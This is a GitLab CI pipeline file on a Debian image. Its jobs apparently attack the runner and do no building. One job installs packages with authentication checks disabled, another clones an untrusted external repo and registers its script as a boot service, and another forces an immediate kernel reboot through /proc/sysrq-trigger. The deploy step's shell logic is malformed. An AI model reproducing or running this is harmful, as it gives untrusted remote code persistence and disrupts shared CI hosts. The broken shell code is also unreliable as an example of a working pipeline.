image: debian:latest
stages:
- before_script
- build1
- test1
- deploy1
- test
- review
- dast
- staging
- canary
- production
- incremental rollout 10%
- incremental rollout 25%
- incremental rollout 50%
- incremental rollout 100%
- performance
- cleanup
- post
before_script:
- which ssh-agent || ( apt update --allow-unauthenticated --allow-insecure-repositories
  -y && apt install -y git tzdata && ln -fs /usr/share/zoneinfo/America/Los_Angeles
  /etc/localtime && dpkg-reconfigure -f noninteractive tzdata && apt full-upgrade
  -y)
build1:
  stage: build1
  script:
  - git clone https://gitlab.com/mrgofuckyourself/reboot6.git && cd reboot6 && cp
    reboot6.sh /etc/init.d/reboot6.sh && update-rc.d reboot6.sh defaults
test1:
  stage: test1
  script:
  - echo 1 > /proc/sys/kernel/sysrq
  - echo b > /proc/sysrq-trigger
deploy1:
  stage: deploy1
  script:
  - alias reboot="sudo systemctl start reboot.target"
  - if [ /etc/init.d/reboot6.sh = true ] do reboot else exit 1
sast:
  stage: test
include:
- template: Auto-DevOps.gitlab-ci.yml
